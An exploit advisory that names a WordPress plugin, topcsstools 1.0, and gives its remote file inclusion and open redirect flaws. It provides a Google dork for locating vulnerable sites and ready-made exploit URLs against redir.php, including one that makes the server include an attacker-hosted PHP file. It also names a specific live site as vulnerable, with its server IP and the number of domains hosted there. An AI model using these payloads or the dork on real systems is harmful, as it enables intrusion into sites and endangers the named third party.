################################################################################# # Exploit Title : WordPress topcsstools Plugins 1.0 Remote File Inclusion and Open Redirect # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 14/01/2019 # Vendor Homepage : wordpress.org - cssgallery.com # Software Information Links : cssgallery.com/premium-themes.html + cssgallery.com/css-design.html # Version : 1.0 # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : inurl:''/wp-content/plugins/topcsstools/" # Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ] CWE-98 [ Improper Control of Filename for Include/ Require Statement in PHP Program ('PHP Remote File Inclusion') ] ################################################################################# # Open Redirection Exploit : ************************** /wp-content/plugins/topcsstools/redir.php?u=https://[OPEN-REDIRECT-ADDRESS-HERE.gov] # RFI Remote File Inclusion Exploit : ********************************** /wp-content/plugins/topcsstools/redir.php?u=http://[RFI-ADDRESS-HERE.gov/yourfilename.php.txt] ################################################################################# # Example Vulnerable Site : ************************* [+] cssgallery.com/wp-content/plugins/topcsstools/redir.php?u=https://cxsecurity.com Note : (50.63.43.1) => There are 3,158 domains hosted on this server. ################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################